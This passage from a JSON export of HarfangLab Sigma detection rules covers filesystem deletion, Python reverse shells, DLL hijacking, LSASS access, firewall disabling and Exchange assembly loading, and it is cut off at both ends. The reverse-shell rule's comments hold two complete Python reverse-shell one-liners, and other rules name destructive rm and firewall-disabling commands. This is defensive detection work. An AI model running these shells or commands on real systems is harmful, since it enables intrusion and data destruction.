"t1485_delete_filesystem_linux.yml", "content": "title: Filesystem Deletion\nid: 31777514-089e-478f-8335-ce2e3f30e79e\ndescription: |\n Detects the execution of rm, a command to remove files or directories with a specific option related to filesystem deletion.\n Adversaries may delete filesystems to hide their intrusion activity or to perform data destruction.\n It is recommended to investigate previous alerts on this machine to hunt for any malicious activity.\nreferences:\n - https://man7.org/linux/man-pages/man1/rm.1.html\n - https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.004/T1070.004.md#atomic-test-8---delete-filesystem---linux\n - https://attack.mitre.org/techniques/T1485/\n - https://attack.mitre.org/techniques/T1070/004/\ndate: 2023/01/06\nmodified: 2025/04/14\nauthor: HarfangLab\ntags:\n - attack.impact\n - attack.t1485\n - attack.defense_evasion\n - attack.t1070.004\n - classification.Linux.Source.ProcessCreation\n - classification.Linux.Behavior.Deletion\nlogsource:\n category: process_creation\n product: linux\ndetection:\n selection:\n Image|endswith: '/rm'\n CommandLine|contains: '--no-preserve-root'\n\n condition: selection\nlevel: critical\nconfidence: strong\n", "block_on_agent": false, "quarantine_on_agent": false, "rule_level_override": null, "rule_id": "31777514-089e-478f-8335-ce2e3f30e79e", "rule_name": "Filesystem Deletion", "rule_description": "Detects the execution of rm, a command to remove files or directories with a specific option related to filesystem deletion.\nAdversaries may delete filesystems to hide their intrusion activity or to perform data destruction.\nIt is recommended to investigate previous alerts on this machine to hunt for any malicious activity.\n", "rule_creation_date": "2023-01-06", "rule_modified_date": "2025-04-14", "rule_os": "linux", "rule_status": null, "rule_tactic_tags": [ "attack.defense_evasion", "attack.impact" ], "rule_technique_tags": [ "attack.t1070.004", "attack.t1485" ], "warnings": null, "errors": null, "declared_in": null, "source": "0950c540-b155-4054-9b93-8fb2888de6ed" } { "id": "319422fe-e9e9-4e50-becd-b946bfa14f25", "test_maturity_current_count": 0, "test_maturity_delay": 7, "test_maturity_threshold": 10, "global_state": "alert", "effective_state": "alert", "rule_effective_level": "high", "rule_effective_confidence": "strong", "alert_count": 0, "source_id": "0950c540-b155-4054-9b93-8fb2888de6ed", "rule_level_overridden": false, "whitelist_count": 0, "last_modifier": { "id": 1, "username": "system_supervisor" }, "endpoint_detection": true, "backend_detection": false, "origin_stack": { "id": "b8e2fe4fc90e4d08", "name": null, "is_current": false, "is_supervisor": true, "is_tenant": false }, "tenant": "b8e2fe4fc90e4d08", "rule_is_depended_on": [], "rule_type": "sigma_rule", "origin_stack_id": "b8e2fe4fc90e4d08", "last_update": "2026-03-23T11:45:34.619443Z", "creation_date": "2026-03-23T11:45:34.619445Z", "enabled": true, "hl_status": "stable", "hl_testing_start_time": "2026-03-23T11:45:34.619449Z", "rule_level": "high", "rule_confidence": "strong", "rule_confidence_override": null, "references": [ "https://book.hacktricks.xyz/generic-methodologies-and-resources/shells/linux", "https://attack.mitre.org/techniques/T1059/006/" ], "name": "t1059_006_reverse_shell_python_linux.yml", "content": "title: Reverse Shell Executed via Python (Linux)\nid: 319422fe-e9e9-4e50-becd-b946bfa14f25\ndescription: |\n Detects the suspicious usage of Python related to reverse shells.\n Reverse shells are remote shell connections initiated from a compromised system to a malicious client as a way to bypass firewall rules.\n It is recommended to investigate the process behavior and command-line arguments to determine if the Python execution is legitimate or indicative of malicious activity such as establishing a reverse shell connection.\nreferences:\n - https://book.hacktricks.xyz/generic-methodologies-and-resources/shells/linux\n - https://attack.mitre.org/techniques/T1059/006/\ndate: 2022/07/01\nmodified: 2025/02/19\nauthor: HarfangLab\ntags:\n - attack.execution\n - attack.t1059.006\n - classification.Linux.Source.ProcessCreation\n - classification.Linux.Script.Python\n - classification.Linux.Behavior.RemoteShell\nlogsource:\n category: process_creation\n product: linux\ndetection:\n # export RHOST=\"127.0.0.1\";export RPORT=12345;python -c 'import sys,socket,os,pty;s=socket.socket();s.connect((os.getenv(\"RHOST\"),int(os.getenv(\"RPORT\"))));[os.dup2(s.fileno(),fd) for fd in (0,1,2)];pty.spawn(\"/bin/sh\")'\n # python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"10.0.0.1\",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/sh\",\"-i\"]);'\n selection_command:\n CommandLine|contains|all:\n - 'import'\n - 'socket'\n - '.socket('\n - '.connect('\n - 'os.dup2('\n - 'fileno()'\n\n selection_shell:\n CommandLine|contains:\n - '.spawn('\n - '.call('\n\n condition: all of selection_*\nlevel: high\nconfidence: strong", "block_on_agent": false, "quarantine_on_agent": false, "rule_level_override": null, "rule_id": "319422fe-e9e9-4e50-becd-b946bfa14f25", "rule_name": "Reverse Shell Executed via Python (Linux)", "rule_description": "Detects the suspicious usage of Python related to reverse shells.\nReverse shells are remote shell connections initiated from a compromised system to a malicious client as a way to bypass firewall rules.\nIt is recommended to investigate the process behavior and command-line arguments to determine if the Python execution is legitimate or indicative of malicious activity such as establishing a reverse shell connection.\n", "rule_creation_date": "2022-07-01", "rule_modified_date": "2025-02-19", "rule_os": "linux", "rule_status": null, "rule_tactic_tags": [ "attack.execution" ], "rule_technique_tags": [ "attack.t1059.006" ], "warnings": null, "errors": null, "declared_in": null, "source": "0950c540-b155-4054-9b93-8fb2888de6ed" } { "id": "319b37d1-f75a-4426-9484-efa3e3788527", "test_maturity_current_count": 0, "test_maturity_delay": 7, "test_maturity_threshold": 10, "global_state": "alert", "effective_state": "alert", "rule_effective_level": "high", "rule_effective_confidence": "strong", "alert_count": 0, "source_id": "0950c540-b155-4054-9b93-8fb2888de6ed", "rule_level_overridden": false, "whitelist_count": 0, "last_modifier": { "id": 1, "username": "system_supervisor" }, "endpoint_detection": true, "backend_detection": false, "origin_stack": { "id": "b8e2fe4fc90e4d08", "name": null, "is_current": false, "is_supervisor": true, "is_tenant": false }, "tenant": "b8e2fe4fc90e4d08", "rule_is_depended_on": [], "rule_type": "sigma_rule", "origin_stack_id": "b8e2fe4fc90e4d08", "last_update": "2026-03-23T11:45:34.592677Z", "creation_date": "2026-03-23T11:45:34.592681Z", "enabled": true, "hl_status": "stable", "hl_testing_start_time": "2026-03-23T11:45:34.592689Z", "rule_level": "high", "rule_confidence": "strong", "rule_confidence_override": null, "references": [ "https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows", "https://github.com/xforcered/WFH", "https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/", "https://attack.mitre.org/techniques/T1574/001/" ], "name": "t1574_001_dll_hijacking_licensingdiag.yml", "content": "title: DLL Hijacking via licensingdiag.exe\nid: 319b37d1-f75a-4426-9484-efa3e3788527\ndescription: |\n Detects potential Windows DLL Hijacking via licensingdiag.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows\n - https://github.com/xforcered/WFH\n - https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2021/12/10\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'licensingdiag.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith:\n - '\\Cabinet.dll'\n - '\\CLIPC.dll'\n - '\\fastprox.dll'\n - '\\licensingdiagspp.dll'\n - '\\propsys.dll'\n - '\\rsaenh.dll'\n - '\\wbemprox.dll'\n - '\\wbemsvc.dll'\n - '\\windows.storage.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n", "block_on_agent": false, "quarantine_on_agent": false, "rule_level_override": null, "rule_id": "319b37d1-f75a-4426-9484-efa3e3788527", "rule_name": "DLL Hijacking via licensingdiag.exe", "rule_description": "Detects potential Windows DLL Hijacking via licensingdiag.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n", "rule_creation_date": "2021-12-10", "rule_modified_date": "2025-07-11", "rule_os": "windows", "rule_status": null, "rule_tactic_tags": [ "attack.defense_evasion", "attack.persistence", "attack.privilege_escalation" ], "rule_technique_tags": [ "attack.t1574.001" ], "warnings": null, "errors": null, "declared_in": null, "source": "0950c540-b155-4054-9b93-8fb2888de6ed" } { "id": "31ccdc74-069f-43fc-87d2-615dcae0c977", "test_maturity_current_count": 0, "test_maturity_delay": 7, "test_maturity_threshold": 10, "global_state": "alert", "effective_state": "alert", "rule_effective_level": "high", "rule_effective_confidence": "strong", "alert_count": 0, "source_id": "0950c540-b155-4054-9b93-8fb2888de6ed", "rule_level_overridden": false, "whitelist_count": 0, "last_modifier": { "id": 1, "username": "system_supervisor" }, "endpoint_detection": true, "backend_detection": false, "origin_stack": { "id": "b8e2fe4fc90e4d08", "name": null, "is_current": false, "is_supervisor": true, "is_tenant": false }, "tenant": "b8e2fe4fc90e4d08", "rule_is_depended_on": [], "rule_type": "sigma_rule", "origin_stack_id": "b8e2fe4fc90e4d08", "last_update": "2026-03-23T11:45:34.070652Z", "creation_date": "2026-03-23T11:45:34.070654Z", "enabled": true, "hl_status": "stable", "hl_testing_start_time": "2026-03-23T11:45:34.070658Z", "rule_level": "high", "rule_confidence": "strong", "rule_confidence_override": null, "references": [ "https://lolbas-project.github.io/lolbas/Binaries/Mavinject/", "https://attack.mitre.org/techniques/T1218/013/", "https://attack.mitre.org/techniques/T1055/001/" ], "name": "t1218_013_mavinject.yml", "content": "title: Proxy Execution via Mavinject\nid: 31ccdc74-069f-43fc-87d2-615dcae0c977\ndescription: |\n Detect a suspicious execution of Microsoft Application Virtualization Injector Mavinject.exe to proxy execution of malicious code.\n This binary, which is digitally signed by Microsoft, can be used to inject malicious DLLs into running processes.\n Attackers may abused it to bypass security restrictions.\n It is recommended to ensure that the injected DLL is legitimate.\nreferences:\n - https://lolbas-project.github.io/lolbas/Binaries/Mavinject/\n - https://attack.mitre.org/techniques/T1218/013/\n - https://attack.mitre.org/techniques/T1055/001/\ndate: 2022/02/28\nmodified: 2025/06/04\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.t1218.013\n - attack.t1055.001\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.LOLBin.Mavinject\n - classification.Windows.Behavior.ProxyExecution\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection:\n OriginalFileName:\n - 'mavinject32.exe'\n - 'mavinject64.exe'\n CommandLine|contains: ' /INJECTRUNNING *.dll'\n\n exclusion_appvclient:\n CommandLine:\n - '?:\\WINDOWS\\system32\\mavinject.exe * /INJECTRUNNING ?:\\Windows\\System32\\Subsystems\\AppVEntSubsystems64.dll 1'\n - '?:\\Windows\\SysWOW64\\mavinject.exe * /INJECTRUNNING ?:\\Windows\\System32\\Subsystems\\AppVEntSubsystems32.dll 1'\n ParentImage: '?:\\Windows\\System32\\AppVClient.exe'\n\n condition: selection and not 1 of exclusion_*\nlevel: high\nconfidence: strong\n", "block_on_agent": false, "quarantine_on_agent": false, "rule_level_override": null, "rule_id": "31ccdc74-069f-43fc-87d2-615dcae0c977", "rule_name": "Proxy Execution via Mavinject", "rule_description": "Detect a suspicious execution of Microsoft Application Virtualization Injector Mavinject.exe to proxy execution of malicious code.\nThis binary, which is digitally signed by Microsoft, can be used to inject malicious DLLs into running processes.\nAttackers may abused it to bypass security restrictions.\nIt is recommended to ensure that the injected DLL is legitimate.\n", "rule_creation_date": "2022-02-28", "rule_modified_date": "2025-06-04", "rule_os": "windows", "rule_status": null, "rule_tactic_tags": [ "attack.defense_evasion" ], "rule_technique_tags": [ "attack.t1055.001", "attack.t1218.013" ], "warnings": null, "errors": null, "declared_in": null, "source": "0950c540-b155-4054-9b93-8fb2888de6ed" } { "id": "31dac5b8-d9c0-4cae-865a-9d528c8e6c00", "test_maturity_current_count": 0, "test_maturity_delay": 7, "test_maturity_threshold": 10, "global_state": "alert", "effective_state": "alert", "rule_effective_level": "high", "rule_effective_confidence": "strong", "alert_count": 0, "source_id": "0950c540-b155-4054-9b93-8fb2888de6ed", "rule_level_overridden": false, "whitelist_count": 0, "last_modifier": { "id": 1, "username": "system_supervisor" }, "endpoint_detection": true, "backend_detection": false, "origin_stack": { "id": "b8e2fe4fc90e4d08", "name": null, "is_current": false, "is_supervisor": true, "is_tenant": false }, "tenant": "b8e2fe4fc90e4d08", "rule_is_depended_on": [], "rule_type": "sigma_rule", "origin_stack_id": "b8e2fe4fc90e4d08", "last_update": "2026-03-23T11:45:34.586826Z", "creation_date": "2026-03-23T11:45:34.586829Z", "enabled": true, "hl_status": "stable", "hl_testing_start_time": "2026-03-23T11:45:34.586837Z", "rule_level": "high", "rule_confidence": "strong", "rule_confidence_override": null, "references": [ "https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows", "https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/", "https://attack.mitre.org/techniques/T1574/001/" ], "name": "t1574_001_dll_hijacking_netplwiz.yml", "content": "title: DLL Hijacking via netplwiz.exe\nid: 31dac5b8-d9c0-4cae-865a-9d528c8e6c00\ndescription: |\n Detects potential Windows DLL Hijacking via netplwiz.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows\n - https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2021/12/10\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'netplwiz.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith:\n - '\\CRYPTBASE.dll'\n - '\\DSROLE.dll'\n - '\\NETPLWIZ.dll'\n - '\\netutils.dll'\n - '\\PROPSYS.dll'\n - '\\samcli.dll'\n - '\\SAMLIB.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n", "block_on_agent": false, "quarantine_on_agent": false, "rule_level_override": null, "rule_id": "31dac5b8-d9c0-4cae-865a-9d528c8e6c00", "rule_name": "DLL Hijacking via netplwiz.exe", "rule_description": "Detects potential Windows DLL Hijacking via netplwiz.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n", "rule_creation_date": "2021-12-10", "rule_modified_date": "2025-07-11", "rule_os": "windows", "rule_status": null, "rule_tactic_tags": [ "attack.defense_evasion", "attack.persistence", "attack.privilege_escalation" ], "rule_technique_tags": [ "attack.t1574.001" ], "warnings": null, "errors": null, "declared_in": null, "source": "0950c540-b155-4054-9b93-8fb2888de6ed" } { "id": "31dd17cd-3ed5-4e4d-949f-71cfddc70c1e", "test_maturity_current_count": 0, "test_maturity_delay": 7, "test_maturity_threshold": 10, "global_state": "alert", "effective_state": "alert", "rule_effective_level": "high", "rule_effective_confidence": "strong", "alert_count": 0, "source_id": "0950c540-b155-4054-9b93-8fb2888de6ed", "rule_level_overridden": false, "whitelist_count": 0, "last_modifier": { "id": 1, "username": "system_supervisor" }, "endpoint_detection": true, "backend_detection": false, "origin_stack": { "id": "b8e2fe4fc90e4d08", "name": null, "is_current": false, "is_supervisor": true, "is_tenant": false }, "tenant": "b8e2fe4fc90e4d08", "rule_is_depended_on": [], "rule_type": "sigma_rule", "origin_stack_id": "b8e2fe4fc90e4d08", "last_update": "2026-03-23T11:45:34.086751Z", "creation_date": "2026-03-23T11:45:34.086753Z", "enabled": true, "hl_status": "stable", "hl_testing_start_time": "2026-03-23T11:45:34.086758Z", "rule_level": "high", "rule_confidence": "strong", "rule_confidence_override": null, "references": [ "https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.004/T1562.004.md#atomic-test-2---disable-microsoft-defender-firewall-via-registry", "https://attack.mitre.org/techniques/T1562/004/", "https://attack.mitre.org/software/S0075/" ], "name": "t1562_004_registry_disable_firewall_public_profile.yml", "content": "title: Windows Firewall Disabled for Public Profile via Registry\nid: 31dd17cd-3ed5-4e4d-949f-71cfddc70c1e\ndescription: |\n Detects when the firewall is disabled for the public profile.\n Adversaries may disable or modify system firewalls in order to bypass controls limiting network usage.\n It is recommended to investigate the process performing this action to determine its legitimacy as well as to look for other suspicious actions on the affected host.\nreferences:\n - https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.004/T1562.004.md#atomic-test-2---disable-microsoft-defender-firewall-via-registry\n - https://attack.mitre.org/techniques/T1562/004/\n - https://attack.mitre.org/software/S0075/\ndate: 2021/10/14\nmodified: 2025/02/19\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.t1562.004\n - attack.s0075\n - classification.Windows.Source.Registry\n - classification.Windows.Behavior.ImpairDefenses\n - classification.Windows.Behavior.SystemModification\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: registry_event\ndetection:\n selection:\n EventType: SetValue\n TargetObject: 'HKLM\\SYSTEM\\CurrentControlSet\\Services\\SharedAccess\\Parameters\\FirewallPolicy\\PublicProfile\\EnableFirewall'\n Details: 'DWORD (0x00000000)'\n\n # Avoid detection when Windows firewall is disabled in graphic mode\n # We have specific rules to detect deactivation via netsh or powershell\n # This rule can match a deactivation via reg.exe for example (used by some malwares or test frameworks)\n filter_svchost:\n ProcessCommandLine:\n - '?:\\windows\\system32\\svchost.exe -k localservicenonetwork'\n - '?:\\windows\\system32\\svchost.exe -k localservicenonetworkfirewall -p'\n - '?:\\Windows\\system32\\svchost.exe -k LocalServiceNoNetwork -p'\n ProcessParentImage: '?:\\Windows\\System32\\services.exe'\n\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong", "block_on_agent": false, "quarantine_on_agent": false, "rule_level_override": null, "rule_id": "31dd17cd-3ed5-4e4d-949f-71cfddc70c1e", "rule_name": "Windows Firewall Disabled for Public Profile via Registry", "rule_description": "Detects when the firewall is disabled for the public profile.\nAdversaries may disable or modify system firewalls in order to bypass controls limiting network usage.\nIt is recommended to investigate the process performing this action to determine its legitimacy as well as to look for other suspicious actions on the affected host.\n", "rule_creation_date": "2021-10-14", "rule_modified_date": "2025-02-19", "rule_os": "windows", "rule_status": null, "rule_tactic_tags": [ "attack.defense_evasion" ], "rule_technique_tags": [ "attack.t1562.004" ], "warnings": null, "errors": null, "declared_in": null, "source": "0950c540-b155-4054-9b93-8fb2888de6ed" } { "id": "31f4d3b1-b0a6-4fd6-9619-caa9a6bd7778", "test_maturity_current_count": 0, "test_maturity_delay": 7, "test_maturity_threshold": 10, "global_state": "alert", "effective_state": "alert", "rule_effective_level": "critical", "rule_effective_confidence": "strong", "alert_count": 0, "source_id": "0950c540-b155-4054-9b93-8fb2888de6ed", "rule_level_overridden": false, "whitelist_count": 0, "last_modifier": { "id": 1, "username": "system_supervisor" }, "endpoint_detection": true, "backend_detection": false, "origin_stack": { "id": "b8e2fe4fc90e4d08", "name": null, "is_current": false, "is_supervisor": true, "is_tenant": false }, "tenant": "b8e2fe4fc90e4d08", "rule_is_depended_on": [], "rule_type": "sigma_rule", "origin_stack_id": "b8e2fe4fc90e4d08", "last_update": "2026-03-23T11:45:34.075072Z", "creation_date": "2026-03-23T11:45:34.075074Z", "enabled": true, "hl_status": "stable", "hl_testing_start_time": "2026-03-23T11:45:34.075079Z", "rule_level": "critical", "rule_confidence": "strong", "rule_confidence_override": null, "references": [ "https://lolbas-project.github.io/lolbas/Binaries/Tttracer/", "https://attack.mitre.org/techniques/T1003/001/" ], "name": "t1003_001_lsass_debugger_tracing_read_access.yml", "content": "title: LSASS Accessed via Debugger Tool\nid: 31f4d3b1-b0a6-4fd6-9619-caa9a6bd7778\ndescription: |\n Detects the use of legitimate debugging tools such as TTDInject or TTTracer to trace the lsass.exe process.\n Time Travel Debugging (TTD) refers to the ability to track and keep records of the state of a running process over time.\n This can be exploited to capture sensitive information like credentials or memory contents.\n It is recommended to investigate the source of the debugging activity, analyze the command-line arguments for suspicious patterns, and review process interactions to identify potential malicious content.\nreferences:\n - https://lolbas-project.github.io/lolbas/Binaries/Tttracer/\n - https://attack.mitre.org/techniques/T1003/001/\ndate: 2021/06/04\nmodified: 2025/02/12\nauthor: HarfangLab\ntags:\n - attack.credential_access\n - attack.t1003.001\n - attack.t1078\n - classification.Windows.Source.ProcessAccess\n - classification.Windows.LOLBin.Tttracer\n - classification.Windows.Behavior.LSASSAccess\n - classification.Windows.Behavior.CredentialAccess\n - classification.Windows.Behavior.PrivilegeEscalation\nlogsource:\n product: windows\n category: process_access\ndetection:\n selection:\n TargetImage|endswith: '\\lsass.exe'\n GrantedAccessStr|contains: \"PROCESS_VM_READ\"\n\n selection_ttdinject_calltrace:\n CallTrace|contains: 'ttdinject.exe'\n\n selection_ttdinject_original_name:\n ProcessOriginalFileName: 'TTDInject.EXE'\n\n condition: selection and 1 of selection_*\nlevel: critical\nconfidence: strong", "block_on_agent": false, "quarantine_on_agent": false, "rule_level_override": null, "rule_id": "31f4d3b1-b0a6-4fd6-9619-caa9a6bd7778", "rule_name": "LSASS Accessed via Debugger Tool", "rule_description": "Detects the use of legitimate debugging tools such as TTDInject or TTTracer to trace the lsass.exe process.\nTime Travel Debugging (TTD) refers to the ability to track and keep records of the state of a running process over time.\nThis can be exploited to capture sensitive information like credentials or memory contents.\nIt is recommended to investigate the source of the debugging activity, analyze the command-line arguments for suspicious patterns, and review process interactions to identify potential malicious content.\n", "rule_creation_date": "2021-06-04", "rule_modified_date": "2025-02-12", "rule_os": "windows", "rule_status": null, "rule_tactic_tags": [ "attack.credential_access" ], "rule_technique_tags": [ "attack.t1003.001", "attack.t1078" ], "warnings": null, "errors": null, "declared_in": null, "source": "0950c540-b155-4054-9b93-8fb2888de6ed" } { "id": "3201beb0-92c6-4539-9056-3a82a91c968b", "test_maturity_current_count": 0, "test_maturity_delay": 7, "test_maturity_threshold": 10, "global_state": "alert", "effective_state": "alert", "rule_effective_level": "low", "rule_effective_confidence": "moderate", "alert_count": 0, "source_id": "0950c540-b155-4054-9b93-8fb2888de6ed", "rule_level_overridden": false, "whitelist_count": 0, "last_modifier": { "id": 1, "username": "system_supervisor" }, "endpoint_detection": true, "backend_detection": false, "origin_stack": { "id": "b8e2fe4fc90e4d08", "name": null, "is_current": false, "is_supervisor": true, "is_tenant": false }, "tenant": "b8e2fe4fc90e4d08", "rule_is_depended_on": [], "rule_type": "sigma_rule", "origin_stack_id": "b8e2fe4fc90e4d08", "last_update": "2026-03-23T11:45:34.598735Z", "creation_date": "2026-03-23T11:45:34.598739Z", "enabled": true, "hl_status": "stable", "hl_testing_start_time": "2026-03-23T11:45:34.598746Z", "rule_level": "low", "rule_confidence": "moderate", "rule_confidence_override": null, "references": [ "https://attack.mitre.org/techniques/T1087/002/" ], "name": "t1087_002_dscacheutil_discovery_user_macos.yml", "content": "title: Users Listed via dscacheutil\nid: 3201beb0-92c6-4539-9056-3a82a91c968b\ndescription: |\n Detects the execution of the dscacheutil command to query information about users.\n Adversaries can use this information for lateral movement or privilege escalation.\n It is recommended to check for malicious behavior by the process launching dscacheutil.\nreferences:\n - https://attack.mitre.org/techniques/T1087/002/\ndate: 2024/06/13\nmodified: 2025/05/15\nauthor: HarfangLab\ntags:\n - attack.discovery\n - attack.t1087.001\n - attack.t1087.002\n - classification.macOS.Source.ProcessCreation\n - classification.macOS.Behavior.Discovery\nlogsource:\n category: process_creation\n product: macos\ndetection:\n selection:\n Image|endswith: 'dscacheutil'\n CommandLine|contains: '-q user'\n\n exclusion_legitimate_parent:\n ParentImage:\n - '/Library/Application Support/AirWatch/hubd'\n - '/usr/local/libexec/ec2-macos-init'\n - '/Applications/Kaspersky Anti-Virus For Mac.app/Contents/MacOS/kavd.app/Contents/MacOS/kavd'\n\n condition: selection and not 1 of exclusion_*\nlevel: low\nconfidence: moderate\n", "block_on_agent": false, "quarantine_on_agent": false, "rule_level_override": null, "rule_id": "3201beb0-92c6-4539-9056-3a82a91c968b", "rule_name": "Users Listed via dscacheutil", "rule_description": "Detects the execution of the dscacheutil command to query information about users.\nAdversaries can use this information for lateral movement or privilege escalation.\nIt is recommended to check for malicious behavior by the process launching dscacheutil.\n", "rule_creation_date": "2024-06-13", "rule_modified_date": "2025-05-15", "rule_os": "macos", "rule_status": null, "rule_tactic_tags": [ "attack.discovery" ], "rule_technique_tags": [ "attack.t1087.001", "attack.t1087.002" ], "warnings": null, "errors": null, "declared_in": null, "source": "0950c540-b155-4054-9b93-8fb2888de6ed" } { "id": "3205ac34-383e-49e2-b12e-a0917cf9ef07", "test_maturity_current_count": 0, "test_maturity_delay": 7, "test_maturity_threshold": 10, "global_state": "alert", "effective_state": "alert", "rule_effective_level": "high", "rule_effective_confidence": "strong", "alert_count": 0, "source_id": "0950c540-b155-4054-9b93-8fb2888de6ed", "rule_level_overridden": false, "whitelist_count": 0, "last_modifier": { "id": 1, "username": "system_supervisor" }, "endpoint_detection": true, "backend_detection": false, "origin_stack": { "id": "b8e2fe4fc90e4d08", "name": null, "is_current": false, "is_supervisor": true, "is_tenant": false }, "tenant": "b8e2fe4fc90e4d08", "rule_is_depended_on": [], "rule_type": "sigma_rule", "origin_stack_id": "b8e2fe4fc90e4d08", "last_update": "2026-03-23T11:45:34.073489Z", "creation_date": "2026-03-23T11:45:34.073491Z", "enabled": true, "hl_status": "stable", "hl_testing_start_time": "2026-03-23T11:45:34.073495Z", "rule_level": "high", "rule_confidence": "strong", "rule_confidence_override": null, "references": [ "https://www.microsoft.com/security/blog/2021/03/02/hafnium-targeting-exchange-servers/", "https://attack.mitre.org/techniques/T1505/003/" ], "name": "t1620_suspicious_dotnet_exchange.yml", "content": "title: Suspicious Dotnet Assembly Loaded by Exchange Server\nid: 3205ac34-383e-49e2-b12e-a0917cf9ef07\ndescription: |\n Detects the loading suspicious a Dotnet library by Exchange Server.\n Attackers may dynamically load assemblies in Exchange to stealthily execute further actions.\n It is recommended to investigate the IIS processes near and after the load for suspicious behavior.\nreferences:\n - https://www.microsoft.com/security/blog/2021/03/02/hafnium-targeting-exchange-servers/\n - https://attack.mitre.org/techniques/T1505/003/\ndate: 2025/07/25\nmodified: 2025/10/16\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.t1620\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.Exploitation\n - classification.Windows.Behavior.Persistence\n - classification.Windows.Behavior.InitialAccess\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection_assembly:\n AssemblyFlags: '0x0'\n FullyQualifiedAssemblyName|contains:\n - 'Version=1.0.0.0, Culture=neutral, PublicKeyToken=null'\n - 'Version=0.0.0.0, Culture=neutral, PublicKeyToken=null'\n ProcessName: 'w3wp.exe'\n\n selection_app_exchange:\n - ProcessCommandLine|contains: 'exchange'\n ProcessName: 'w3wp.exe'\n - ProcessParentCommandLine|contains: 'exchange'\n ProcessParentName: 'w3wp.exe'\n - ProcessGrandparentCommandLine|contains: 'exchange'\n ProcessGrandparentName: 'w3wp.exe'\n\n filter_path:\n ModuleILPath|contains: ':\\'\n\n exclusion_unknown:\n FullyQualifiedAssemblyName: '????????, Version=?.0.0.0, Culture=neutral, PublicKeyToken=null'\n\n condition: all of selection_* and not 1 of filter_* and not 1 of exclusion_*\nlevel: high\nconfidence: strong\n", "block_on_agent": false, "quarantine_on_agent": false, "rule_level_override": null, "rule_id": "3205ac34-383e-49e2-b12e-a0917cf9ef07", "rule_name": "Suspicious Dotnet Assembly Loaded by Exchange Server", "rule_description": "Detects the loading suspicious a Dotnet library by Exchange Server.\nAttackers may dynamically load assemblies in Exchange to stealthily execute 